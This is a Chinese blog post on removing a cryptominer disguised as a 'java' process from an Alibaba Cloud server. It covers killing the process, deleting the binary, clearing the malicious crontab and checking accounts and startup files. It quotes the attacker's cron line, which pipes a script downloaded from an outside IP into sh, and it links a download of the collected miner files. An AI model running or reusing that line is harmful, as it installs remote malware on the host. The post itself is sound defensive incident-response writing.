阿里云ECS遭挖矿程序攻击解决方法(彻底清除挖矿程序,顺便下载了挖矿程序的脚本)
一:杀死挖矿程序进程
在服务器上使用top指令查看cpu的使用情况,发现有一个叫java的程序占用cpu高达99.9%
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND 5778 root 20 0 373576 2720 404 S 99.9 0.1 1252:00 java 1 root 20 0 43208 3544 2420 S 0.0 0.2 0:04.52 systemd 2 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kthreadd 3 root 20 0 0 0 0 S 0.0 0.0 0:00.08 ksoftirqd/0 5 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 kworker/0:0H 7 root rt 0 0 0 0 S 0.0 0.0 0:00.00 migration/0
这个是挖矿程序伪装成java程序,用jps查看java进程的时候并没有这个程序。
通过pkill 5778杀死进程
二:删除挖矿程序
我们通过cd /proc/5778(这个java挖矿程序的pid)进入到这个进程的目录然后通过ll命令查看这个进程程序的位置
dr-xr-xr-x 2 root root 0 Oct 11 17:24 attr
-rw-r--r-- 1 root root 0 Oct 11 17:24 autogroup
-r-------- 1 root root 0 Oct 11 17:24 auxv
-r--r--r-- 1 root root 0 Oct 11 17:24 cgroup
--w------- 1 root root 0 Oct 11 17:24 clear_refs
-r--r--r-- 1 root root 0 Oct 10 20:18 cmdline
-rw-r--r-- 1 root root 0 Oct 11 17:24 comm
-rw-r--r-- 1 root root 0 Oct 11 17:24 coredump_filter
-r--r--r-- 1 root root 0 Oct 11 17:24 cpuset
lrwxrwxrwx 1 root root 0 Oct 11 17:24 cwd -> /
-r-------- 1 root root 0 Oct 11 17:24 environ
lrwxrwxrwx 1 root root 0 Oct 10 20:18 exe -> /var/tmp/java
dr-x------ 2 root root 0 Oct 10 20:18 fd
dr-x------ 2 root root 0 Oct 11 17:24 fdinfo
然后我们进入这个程序的目录找到这个程序然后删除
-rwxr-xr-x 1 root root 2386544 Oct 9 15:53 java
rm -rf java
不过做到这里不久之后这个挖矿程序还是会死灰复燃
三:清除挖矿程序的定时任务
因为你的系统中已经被设置了一个定时任务,定时下载挖矿程序并运行
通过crontab -l 查看该用户下的所有定时任务
* * * * * wget -q -O - http://46.249.38.186/cr.sh | sh > /dev/null 2>&1
无时无刻的静默执行这个cr.sh脚本,还清除了记录,真的是阴啊!
crontab -r 删除定时任务
不过我好奇这个脚本里写了什么,于是乎修改了一下这个定时任务,把他的脚本下载了下来,发现通过这个脚本又执行了另一个脚本,还得到了一个配置文件,再加上伪装成java的挖矿软件,一共四个东西,我都上传了,有兴趣的可以下来看下。
https://download.csdn.net/download/zzf1510711060/10714458
最后提醒下,服务器的一些高危端口千万不要随便开启啊,如果用阿里云搭建集群的话可以配置安全组规则,针对于特定的主机开放端口,不要对所有ip开放端口。
四:检查用户列表,.ssh文件,开机启动
cat /etc/passwd 检查是否有未知用户
cat ~/.ssh/authrized_keys 检查是否对未知用户授权
cat known_hosts 检查是否有未知的用host
/etc/rc.local /etc/rc.sysinit /etc/inittab /etc/profile 这些开机启动的系统配置目录下面可能有挖矿程序的脚本,检查一下
步骤简化:
1.pkill java 杀掉挖矿程序的进程
2.rm -rf java 删除挖矿程序
3.crontab -r 删除定时任务
4.检查用户列表,开机启动,.ssh文件
5.去阿里云控制台设置安全组关闭不安全端口
阿里云ECS遭挖矿程序攻击解决方法(彻底清除挖矿程序,顺便下载了挖矿程序的脚本)相关推荐
- 无法访问阿里云ECS实例运行网站的解决方法
情况 买的是阿里云ECS云服务器,按照万无一失的Nginx安装方法安装成功之后,浏览器上访问IP地址,看不到该看到的Wecome to nginx !页面. 系统环境:Centos7.4 前期尝试解决 ...
- linux(centos8):阿里云ecs配置smtps发邮件(解决不能通过25端口发邮件问题)
一,2016年9月后购买的阿里云ecs不再支持通过25端口发送邮件 官方的建议是使用465端口 465端口(SMTPS): 465端口是为SMTPS(SMTP-over-SSL)协议服务开放的 它是S ...
- 共享在阿里云ecs上安装自定义iso的方法
本文关键字:阿里云 自定义iso,阿里云 自定义镜像 应用场景: 首先,最基本的目的:你想在云主机上安装自定义iso,比如一份精简或优化过了的镜像/高版本的系统镜像,而不是运营商提供给你的那些,或你想 ...
- 阿里云漏洞验证需要付费的解决方法
阿里云服务器提示漏洞,修复需要付费,验证需要付费,是因为阿里云帮你解决漏洞,收费也是应该的.咱们今天说的是免费解决方法. 新用户会给个七天的免费修复验证,七天后就不能试用 咱们现在说非七天试用. 1. ...
- 商标注册未通过阿里云初审被驳回原因和解决方法
商标注册服务未通过阿里云初步审核,阿里云商标注册被未通过阿里云初审,被阿里云驳回什么原因?如何解决?问题包括商标申请人信息有误.委托书格式错误.营业执照不合格.商标图样冲突.商标已被注册等原因,TM8 ...
- 小程序wx.request访问阿里云公共资源返回403的独家解决方法
文章目录 1.问题描述 2.问题解决 3.结语 1.问题描述 在我已经在小程序管理后台设置好request合法域名的前提下: 微信小程序小程序后端使用wx.request访问阿里云公共资源返回 ...
- 终端连接阿里云服务器出现Permission denied (publickey)解决方法
今天在使用终端连接阿里云服务器出现Permission denied (publickey)这个问题,解决方法如下: 登录阿里云后台查看PasswordAuthentication cat /etc/ ...
- 阿里云服务器不能发邮件的解决方法
最近把一个项目部署到阿里云服务器上了,项目的其他页面都可以在浏览器上显示出来.需要实现的功能是点击注册按钮是需要通过发送一封邮件给注册的邮箱,客户通过点击邮箱的链接来激活注册的账号.但是在注册页面,用 ...
- 阿里云ECS代理访问阿里云RDS MySQL数据库
一.前言 阿里云RDS数据白名单一般只对内部的服务器开放,一般不会开放给外网直接访问,有时开发需要直接访问RDS数据库,平时我们使用的网络都是动态公网IP,经常会变化,设置白名单相对繁琐一点.想了一个 ...
最新文章
- android 展开式按钮,Android自定义View实现可展开、会呼吸的按钮
- Spring Boot中使用JdbcTemplate访问数据库
- java代码逻辑讲解_java逻辑控制语句实例详解
- 电气期刊论文实现:基于输电线路容量安全约束的电力机组组合
- python中is和 的区别_Python中is和==的区别
- shell脚本实现自动化备份
- 【高数+AI】中山大学的学霸小哥开源了一个能帮你做高数题的AI
- HTTP报文-请求报文和响应报文
- 超全面!完全没有设计基础的新手如何做好PPT配色?(附神器)
- js获取当前卫星云图url并播放
- 路在脚下,梦就在前方
- 数据结构与算法的个人学习经验小结(总)
- ssl 2133 腾讯大战360#spfa#
- 社保交满15年就不用交了吗?常见重点问答请查收,千万别误解了~
- 关于如何连接网络打印机
- java基于ssm的洗衣店管理系统
- 理论+实验·MySQL数据库管理
- 如果您信任此演示文稿的来源_7个技巧将使您的演示文稿更上一层楼
- 粒子群算法java_基于粒子群算法求解求解TSP问题(JAVA)
- 使用MFC修改注册表DWORD类型的值